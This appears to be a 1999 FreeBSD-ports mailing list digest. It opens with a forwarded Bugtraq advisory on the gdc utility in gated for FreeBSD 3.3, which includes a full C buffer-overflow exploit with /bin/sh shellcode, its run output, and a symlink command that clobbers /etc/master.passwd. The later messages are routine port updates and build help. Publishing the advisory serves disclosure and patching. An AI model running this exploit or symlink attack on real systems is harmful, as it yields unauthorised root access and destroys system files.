jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 905D915AF2; Wed, 1 Dec 1999 09:25:36 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 0E4B01C2B; Wed, 1 Dec 1999 11:24:43 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 07BE8381B; Wed, 1 Dec 1999 11:24:43 -0500 (EST) Date: Wed, 1 Dec 1999 11:24:43 -0500 (EST) From: Bill Fumerola To: freebsd-security@freebsd.org Cc: freebsd-ports@FreeBSD.org Subject: FreeBSD 3.3 gated-3.1.5 local exploit (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Tada. --=20 - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - ---------- Forwarded message ---------- Date: Tue, 30 Nov 1999 15:31:06 MST From: Brock Tellier To: BUGTRAQ@SECURITYFOCUS.COM Subject: FreeBSD 3.3 gated-3.1.5 local exploit Greetings, OVERVIEW Vulnerabilities exist in gdc in (at least) FreeBSD 3.3-RELEASE which will allow certian users to gain root privs and overwrite system files. BACKGROUND My tests were done ONLY on FreeBSD 3.3-RELEASE with the gated-3.5.11=20 included on the installation CD. By default on FreeBSD (when installed at initial install by /stand/sysinstall), gdc is given permissions as shown: -rwsr-x--- 1 root wheel 23832 Sep 10 23:21 /usr/local/bin/gdc Thus only users in the group 'wheel' may run gdc. =20 DETAILS Vuln #1 /usr/local/bin/gdc contains a buffer overflow that may ONLY be exploited=20 by the group 'wheel'. According to the man page the default group is "gdmaint", but it was not installed this way by default on my system, nor were any instructions given to make a gdmaint group. The overflow comes when gdc is supplied a large -t time option on the command line. Some may scoff at this particular hole, claiming that if you've let a malicious user have/gain wheel privs, things have already gone past the point of no= =20 return. These people are probably right, but in any case, it's worth noting. Vuln #2 /usr/local/bin/gdc allows debugging output to be written to a file in=20 /var/tmp which follows symlinks. This vulnerability can be exploited to overwrite root-owned system files (more of a DoS, since it doesn't change the destination file's perms) regardless of the user who ran gdc. Once again, a normal user without wheel or similar gid cannot run gdc. However a normal user may create the symlinks that a wheel group user's gdc will follow. EXPLOITS buffer overflow as part of the wheel group: $ gcc -o gdcx gdcx.c $ ls -la `which gdc` -rwsr-x--- 1 root wheel 23832 Sep 10 23:21 /usr/local/bin/gdc $ id uid=3D1000(xnec) gid=3D1000(xnec) groups=3D1000(xnec), 0(wheel) $ ./gdcx gdc exploit for FreeBSD 3.3-RELEASE eip=3D0xbfbfdb65 offset=3D0 buflen=3D4093 NOPs to 937 Shellcode to 1004 eip to 1008 gdc: invalid wait time: =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=EB5^Y3=C0=89F=F5=83=C8f=89F=F9=8D-=89^ 3=D2R=89V=89V =8DF P=8D P=B8{V4 5@V4 Q=9A>:)(:<=E8=C6=FF=FF=FF/bin/she=DB=BF=BF #=20 ---- gdcx.c ---- /*=20 * gdc exploit for Freebsd-3.3 yields euid=3D0(root) * by default, only group wheel (or whatever your trusted gated group is) * and root can run gdc * Brock Tellier btellier@usa.net */ #include char shell[]=3D /* mudge@l0pht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; main (int argc, char *argv[] ) { int x =3D 0; int y =3D 0; int offset =3D 0; int bsize =3D 4093; char buf[bsize]; int eip =3D 0xbfbfdb65; /* works for me */ if (argv[1]) {=20 offset =3D atoi(argv[1]); eip =3D eip + offset; } fprintf(stderr, "gdc exploit for FreeBSD 3.3-RELEASE \n"= ); fprintf(stderr, "eip=3D0x%x offset=3D%d buflen=3D%d\n", eip, offset, bsize= ); =20 for ( x =3D 0; x < 937; x++) buf[x] =3D 0x90; fprintf(stderr, "NOPs to %d\n", x); =20 for ( y =3D 0; y < 67 ; x++, y++) buf[x] =3D shell[y]; fprintf(stderr, "Shellcode to %d\n",x); =20 buf[x++] =3D eip & 0x000000ff; buf[x++] =3D (eip & 0x0000ff00) >> 8; buf[x++] =3D (eip & 0x00ff0000) >> 16; buf[x++] =3D (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize - 1]=3D'\0'; execl("/usr/local/bin/gdc", "gdc", "-t", buf, NULL); } --------- for symlink vulnerability: ln -s /etc/master.passwd /var/tmp/gated_dump (wait for priv'd user to run /usr/local/bin/gdc dump) Brock Tellier UNIX Systems Administrator Chicago, IL, USA ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=3D1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 10:10:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from argon.blackdawn.com (deepspace9.dcds.edu [207.231.151.2]) by hub.freebsd.org (Postfix) with ESMTP id E0C9114D0F for ; Wed, 1 Dec 1999 10:10:45 -0800 (PST) (envelope-from will@argon.blackdawn.com) Received: (from will@localhost) by blackdawn.com (8.9.3/8.9.3) id OAA00610; Tue, 30 Nov 1999 14:29:58 -0500 (EST) (envelope-from will) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <99112813355301.04840@mlobo.nlink.com.br> Date: Tue, 30 Nov 1999 14:29:58 -0500 (EST) From: will andrews To: kdevelop@barney.cs.uni-potsdam.de, Mario Lobo Subject: RE: Problem on making kdevelop 1.0beta4.1 Cc: ports@FreeBSD.ORG Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30-Nov-99 Mario Lobo wrote: > I'm trying to make it on a FreeBSD 2.2.8 /qt 1.44/ kde 1.1.2 when i get the > following errors: > > Can somebody gimme a hint ?? Certainly. I use FreeBSD 4.0-CURRENT, 3.3-STABLE, and 2.2.8-STABLE. Your problem lies in the fact that 2.2.8's compiler is _WAY_ out of date. Even if you installed the gcc-devel port (updated to g++ 2.95.2, that is), I do not know if you'd be successful in compiling kdevelop.. By the way, why aren't you using the ports (Qt 1.44, AFAIK, is not in there)? KDevelop requires Qt 1.42 and kdelibs 1.1 compiled with g++ 2.91.66 or later (as far as I know). I am currently working on a port for kdevelop, however, I doubt I'll be submitting it anytime soon, so long as: 1) The kdelibs11 and qt142 ports are not set to use the newer g++ by default. They need the USE_NEWGCC switch first. And there is nothing I can do about these problems, since I am not the maintainer of either of these ports. 2) I need to port some of its dependencies (such as kdoc, kiconwrite, and a few others). 3) It still does not find certain parts of the documentation. I'm looking into this. If you want any kind of kdevelop port committed to the ports tree for FreeBSD, you will need to bug the following: 1) Maintainer of kdelibs11 port 2) Maintainer of Qt 1.42 port In the meantime, I highly advise that you upgrade to (at least) FreeBSD 3.3-STABLE. If you intend to use a program like kdevelop on a FreeBSD machine, I'll be damned if you use an outdated version of it. The only reason anyone would use older versions is if you are using the machine as a server and simply do not need the newer "features". Period. It's my understanding, of course, that R. Imura has done a writeup of the kdevelop port. Check the -ports archive for the link. See http://www.FreeBSD.ORG/search/ and search the -ports archive. In the meantime, if anyone wishes to test my port, they can contact me and I'll send them a copy of the current shar. Regards, -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 10:20:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8FD2915087 for ; Wed, 1 Dec 1999 10:20:23 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA81150; Wed, 1 Dec 1999 10:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mail.iserlohn.netsurf.de (mail.iserlohn.netsurf.de [194.195.194.253]) by hub.freebsd.org (Postfix) with ESMTP id CE06815B2F for ; Wed, 1 Dec 1999 10:14:25 -0800 (PST) (envelope-from sas@schumann.cx) Received: from schumann.cx (hennen32s.iserlohn.netsurf.de [194.195.194.226]) by mail.iserlohn.netsurf.de (8.9.1/8.9.1) with SMTP id TAA18319 for ; Wed, 1 Dec 1999 19:13:51 +0100 Received: (qmail 19100 invoked by uid 500); 1 Dec 1999 18:14:09 -0000 Message-Id: <19991201181409.19099.qmail@schumann.cx> Date: 1 Dec 1999 18:14:09 -0000 From: Sascha Schumann To: FreeBSD-gnats-submit@freebsd.org Cc: sascha@schumann.cx X-Send-Pr-Version: 3.2 Subject: ports/15210: update port: security/mhash Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15210 >Category: ports >Synopsis: update port: security/mhash >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 1 10:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Sascha Schumann >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: n/a >Description: Upgrade to mhash-0.6.1. The distribution site changed. >How-To-Repeat: n/a >Fix: Changed files: Makefile files/md5 diff -Nur mhash/Makefile mhash-new/Makefile --- mhash/Makefile Tue Aug 31 12:17:37 1999 +++ mhash-new/Makefile Sun Nov 28 18:07:41 1999 @@ -1,14 +1,14 @@ # New ports collection makefile for: mhash -# Version required: 0.5.0 +# Version required: 0.6.1 # Date created: Mon Jun 28 17:59:13 PDT 1999 # Whom: nsayer@freebsd.org # # $FreeBSD: ports/security/mhash/Makefile,v 1.4 1999/08/31 01:51:17 peter Exp $ # -DISTNAME= mhash-0.5.0 +DISTNAME= mhash-0.6.1 CATEGORIES= security -MASTER_SITES= http://sasweb.de/mhash/data/ +MASTER_SITES= http://schumann.cx/mhash/dl/ MAINTAINER= nsayer@freebsd.org diff -Nur mhash/files/md5 mhash-new/files/md5 --- mhash/files/md5 Tue Jun 29 00:37:59 1999 +++ mhash-new/files/md5 Sun Nov 28 18:08:42 1999 @@ -1 +1 @@ -MD5 (mhash-0.5.0.tar.gz) = 71b0d98bacc55a6247615bb829dd3b99 +MD5 (mhash-0.6.1.tar.gz) = c350191d105cb9e74dc40c3b420ed733 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 10:36:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.af.airnet.ne.jp (mail.af.airnet.ne.jp [210.159.66.49]) by hub.freebsd.org (Postfix) with ESMTP id D9D2014BC9 for ; Wed, 1 Dec 1999 10:36:18 -0800 (PST) (envelope-from imura@cs.titech.ac.jp) Received: from imura.cs.titech.ac.jp (tok031.airnet.ne.jp [210.159.88.31]) by mail.af.airnet.ne.jp (8.8.8/3.6W/06/13/98-AF.AIRNET.NE.JP) with ESMTP id DAA15844; Thu, 2 Dec 1999 03:35:01 +0900 Posted-Date: Thu, 2 Dec 1999 03:34:55 +0900 (JST) To: andrews@technologist.com Cc: kdevelop@barney.cs.uni-potsdam.de, mlobo@nlink.com.br, ports@FreeBSD.ORG Subject: RE: Problem on making kdevelop 1.0beta4.1 From: "R. Imura" In-Reply-To: References: <99112813355301.04840@mlobo.nlink.com.br> X-Mailer: Mew version 1.94b20 on Emacs 19.34 / Mule 2.3 =?iso-2022-jp?B?KBskQkt2RSYyVhsoQik=?= X-Prom-Mew: Prom-Mew 1.93.4 (procmail reader for Mew) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19991202033454E.imura@cs.titech.ac.jp> Date: Thu, 02 Dec 1999 03:34:54 +0900 X-Dispatcher: imput version 990401(IM113) Lines: 33 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: will andrews Subject: RE: Problem on making kdevelop 1.0beta4.1 Date: Tue, 30 Nov 1999 14:29:58 -0500 (EST) > On 30-Nov-99 Mario Lobo wrote: > > I'm trying to make it on a FreeBSD 2.2.8 /qt 1.44/ kde 1.1.2 when i get the > > following errors: > > > > Can somebody gimme a hint ?? > > Certainly. I use FreeBSD 4.0-CURRENT, 3.3-STABLE, and 2.2.8-STABLE. Your > problem lies in the fact that 2.2.8's compiler is _WAY_ out of date. Even if > you installed the gcc-devel port (updated to g++ 2.95.2, that is), I do not > know if you'd be successful in compiling kdevelop.. How about .if ${OSVERSION} < 400004 BROKEN= 'because of obsoluted compiler' .endif ? > It's my understanding, of course, that R. Imura has > done a writeup of the kdevelop port. Check the -ports archive for the link. > See http://www.FreeBSD.ORG/search/ and search the -ports archive. Yes, I'm planning to import my kdevelop port. But, it's for kde-i18n. I know it's painful to you all changing from the normal kde to kde-i18n... --- R. Imura To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 11:40:28 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 93D9814A25 for ; Wed, 1 Dec 1999 11:40:24 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA93370; Wed, 1 Dec 1999 11:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from norrgarden1.norrgarden.se (norrgarden1.norrgarden.se [195.100.133.214]) by hub.freebsd.org (Postfix) with ESMTP id 8B91714BFE for ; Wed, 1 Dec 1999 11:33:24 -0800 (PST) (envelope-from cj@norrgarden1.norrgarden.se) Received: (from root@localhost) by norrgarden1.norrgarden.se (8.9.3/8.9.3) id UAA19751; Wed, 1 Dec 1999 20:31:49 +0100 (CET) (envelope-from cj) Message-Id: <199912011931.UAA19751@norrgarden1.norrgarden.se> Date: Wed, 1 Dec 1999 20:31:49 +0100 (CET) From: calle.madestrand@norrgarden.se Reply-To: calle.madestrand@norrgarden.se To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15212: important update of BitchX 1.0 port! Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15212 >Category: ports >Synopsis: wserv is in the wrong location, should be in /usr/local/lib/bx >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 1 11:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Carl Johan Madestrand >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: >Description: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # /usr/ports/irc/bitchx-1.0 # /usr/ports/irc/bitchx-1.0/pkg # /usr/ports/irc/bitchx-1.0/pkg/DESCR # /usr/ports/irc/bitchx-1.0/pkg/PLIST # /usr/ports/irc/bitchx-1.0/pkg/COMMENT # /usr/ports/irc/bitchx-1.0/patches # /usr/ports/irc/bitchx-1.0/patches/patch-aa # /usr/ports/irc/bitchx-1.0/files # /usr/ports/irc/bitchx-1.0/files/md5 # /usr/ports/irc/bitchx-1.0/Makefile # echo c - /usr/ports/irc/bitchx-1.0 mkdir -p /usr/ports/irc/bitchx-1.0 > /dev/null 2>&1 echo c - /usr/ports/irc/bitchx-1.0/pkg mkdir -p /usr/ports/irc/bitchx-1.0/pkg > /dev/null 2>&1 echo x - /usr/ports/irc/bitchx-1.0/pkg/DESCR sed 's/^X//' >/usr/ports/irc/bitchx-1.0/pkg/DESCR << 'END-of-/usr/ports/irc/bitchx-1.0/pkg/DESCR' XBitchX is an enhanced ircII client. It includes many built-in features Xnormally found only in scripts. Including, full ANSI color, userlists, Xflood protection, and built CDCC (XDCC) file offering. X Xhttp://www.bitchx.org X X- LoRd_CJ X calle.madestrand@norrgarden.se END-of-/usr/ports/irc/bitchx-1.0/pkg/DESCR echo x - /usr/ports/irc/bitchx-1.0/pkg/PLIST sed 's/^X//' >/usr/ports/irc/bitchx-1.0/pkg/PLIST << 'END-of-/usr/ports/irc/bitchx-1.0/pkg/PLIST' Xbin/BitchX Xbin/scr-bx Xlib/bx/wserv Xlib/bx/BitchX.help Xlib/bx/BitchX.quit Xlib/bx/BitchX.reasons X@dirrm lib/bx X END-of-/usr/ports/irc/bitchx-1.0/pkg/PLIST echo x - /usr/ports/irc/bitchx-1.0/pkg/COMMENT sed 's/^X//' >/usr/ports/irc/bitchx-1.0/pkg/COMMENT << 'END-of-/usr/ports/irc/bitchx-1.0/pkg/COMMENT' XAn alternative ircII color client END-of-/usr/ports/irc/bitchx-1.0/pkg/COMMENT echo c - /usr/ports/irc/bitchx-1.0/patches mkdir -p /usr/ports/irc/bitchx-1.0/patches > /dev/null 2>&1 echo x - /usr/ports/irc/bitchx-1.0/patches/patch-aa sed 's/^X//' >/usr/ports/irc/bitchx-1.0/patches/patch-aa << 'END-of-/usr/ports/irc/bitchx-1.0/patches/patch-aa' X*** source/irc.c.orig Wed Dec 1 15:52:44 1999 X--- source/irc.c Wed Dec 1 15:53:04 1999 X*************** X*** 457,463 **** X #if defined(WANT_DETACH) && !defined(GUI) X kill_attached_if_needed(0); X #endif X- current_ftarget = stdout; X charset_lat1(); X fprintf(stdout, "\r"); X fflush(stdout); X--- 457,462 ---- END-of-/usr/ports/irc/bitchx-1.0/patches/patch-aa echo c - /usr/ports/irc/bitchx-1.0/files mkdir -p /usr/ports/irc/bitchx-1.0/files > /dev/null 2>&1 echo x - /usr/ports/irc/bitchx-1.0/files/md5 sed 's/^X//' >/usr/ports/irc/bitchx-1.0/files/md5 << 'END-of-/usr/ports/irc/bitchx-1.0/files/md5' XMD5 (BitchX-1.0c12.tar.gz) = 75af2dbd07da5d68230e09bb52185ea4 END-of-/usr/ports/irc/bitchx-1.0/files/md5 echo x - /usr/ports/irc/bitchx-1.0/Makefile sed 's/^X//' >/usr/ports/irc/bitchx-1.0/Makefile << 'END-of-/usr/ports/irc/bitchx-1.0/Makefile' X# New ports collection makefile for: BitchX ircII client X# Version required: 1.0c12 X# Date created: 1 December 1999 X# Whom: LoRd_CJ X# X# $FreeBSD$ X XDISTNAME= BitchX-1.0c12 XPKGNAME= bitchx-1.0 XCATEGORIES= irc XMASTER_SITES= ftp://ftp.bitchx.com/pub/ \ X ftp://bitchx.dimension6.com/pub/ X XMAINTAINER= calle.madestrand@norrgarden.se X XWRKSRC= ${WRKDIR}/BitchX X Xpre-patch: X @${CP} ${WRKSRC}/source/irc.c ${WRKSRC} X XGNU_CONFIGURE= yes XUSE_GMAKE= yes XCONFIGURE_ARGS= \ X --with-plugins \ X XMAN1= bitchx.1 XMANCOMPRESSED= yes X Xdo-install: X ${MKDIR} ${PREFIX}/lib/bx X ${INSTALL_PROGRAM} ${WRKSRC}/source/BitchX ${PREFIX}/bin X ${INSTALL_PROGRAM} ${WRKSRC}/source/scr-bx ${PREFIX}/bin X ${INSTALL_PROGRAM} ${WRKSRC}/source/wserv ${PREFIX}/lib/bx X ${INSTALL_DATA} ${WRKSRC}/BitchX.help ${PREFIX}/lib/bx X ${INSTALL_DATA} ${WRKSRC}/BitchX.quit ${PREFIX}/lib/bx X ${INSTALL_DATA} ${WRKSRC}/BitchX.reasons ${PREFIX}/lib/bx X ${INSTALL_MAN} ${WRKSRC}/doc/bitchx.1.gz ${PREFIX}/man/man1 X X.include END-of-/usr/ports/irc/bitchx-1.0/Makefile exit >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 12:34:20 1999 Delivered-To: freebsd-ports@freebsd.org Received: from viper.lovett.com (viper.lovett.com [216.60.121.173]) by hub.freebsd.org (Postfix) with ESMTP id E6A6515277 for ; Wed, 1 Dec 1999 12:34:09 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by viper.lovett.com with local (Exim 3.03 #1) id 11tGQm-000M3I-00; Wed, 01 Dec 1999 14:32:52 -0600 Date: Wed, 1 Dec 1999 14:32:52 -0600 From: Ade Lovett To: will andrews Cc: ports@FreeBSD.ORG Subject: Re: Problem on making kdevelop 1.0beta4.1 Message-ID: <19991201143252.L79505@lovett.com> References: <99112813355301.04840@mlobo.nlink.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from andrews@technologist.com on Tue, Nov 30, 1999 at 02:29:58PM -0500 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Nov 30, 1999 at 02:29:58PM -0500, will andrews wrote: > > [snip] > > 1) The kdelibs11 and qt142 ports are not set to use the newer g++ by > default. They need the USE_NEWGCC switch first. And there is nothing > I can do about these problems, since I am not the maintainer of > either of these ports. > > [snip] > > If you want any kind of kdevelop port committed to the ports tree for FreeBSD, > you will need to bug the following: > > 1) Maintainer of kdelibs11 port > 2) Maintainer of Qt 1.42 port Out of curiosity, has anyone contacted either Stefan or Andreas to get the necessary changes made? Alternatively (and this is addressed more to the committers that read -ports), if I or someone else come up with a set of patches to both qt142 and kde*11 that: (a) use USE_NEWGCC (b) bump the shared library version numbers so that it's obvious that (a) has happened. would they get committed -- ideally before a ports freeze for 3.4R -aDe -- Ade Lovett, Austin, TX. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 13: 2:25 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 83F67151C3 for ; Wed, 1 Dec 1999 13:02:14 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA02806; Wed, 1 Dec 1999 13:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 6545C151C1 for ; Wed, 1 Dec 1999 12:54:47 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 1C9079B36; Wed, 1 Dec 1999 15:54:40 -0500 (EST) Message-Id: <19991201205440.1C9079B36@pawn.primelocation.net> Date: Wed, 1 Dec 1999 15:54:40 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15214: Update port: archivers/lzo Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15214 >Category: ports >Synopsis: Update port: archivers/lzo >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 1 13:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 4.0-CURRENT i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 4.0-CURRENT i386 >Description: Update port: archivers/lzo * Update port to 1.06 >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/archivers/lzo/Makefile,v retrieving revision 1.9 diff -u -r1.9 Makefile --- Makefile 1999/11/21 00:53:52 1.9 +++ Makefile 1999/12/01 20:52:32 @@ -6,7 +6,7 @@ # $FreeBSD: ports/archivers/lzo/Makefile,v 1.9 1999/11/21 00:53:52 cpiazza Exp $ # -DISTNAME= lzo-1.04 +DISTNAME= lzo-1.06 CATEGORIES= archivers devel MASTER_SITES= ${MASTER_SITE_SUNSITE} \ http://wildsau.idv.uni-linz.ac.at/mfx/lzo-download/ Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/archivers/lzo/files/md5,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 md5 --- md5 1998/12/01 23:11:12 1.1.1.1 +++ md5 1999/12/01 20:52:32 @@ -1 +1 @@ -MD5 (lzo-1.04.tar.gz) = 550966692dbc93f31dc078b13c175afa +MD5 (lzo-1.06.tar.gz) = 01a56f80a9186383d2183f917e9fe4e9 Index: patches/patch-ac =================================================================== RCS file: /home/ncvs/ports/archivers/lzo/patches/patch-ac,v retrieving revision 1.1 diff -u -r1.1 patch-ac --- patch-ac 1999/11/21 00:53:55 1.1 +++ patch-ac 1999/12/01 20:52:32 @@ -1,41 +1,65 @@ ---- configure.orig Sat Nov 13 11:17:25 1999 -+++ configure Sat Nov 13 11:23:32 1999 -@@ -1141,9 +1141,9 @@ - if test "$ac_test_CFLAGS" = set; then - CFLAGS="$ac_save_CFLAGS" - elif test $ac_cv_prog_cc_g = yes; then +--- configure.orig Mon Nov 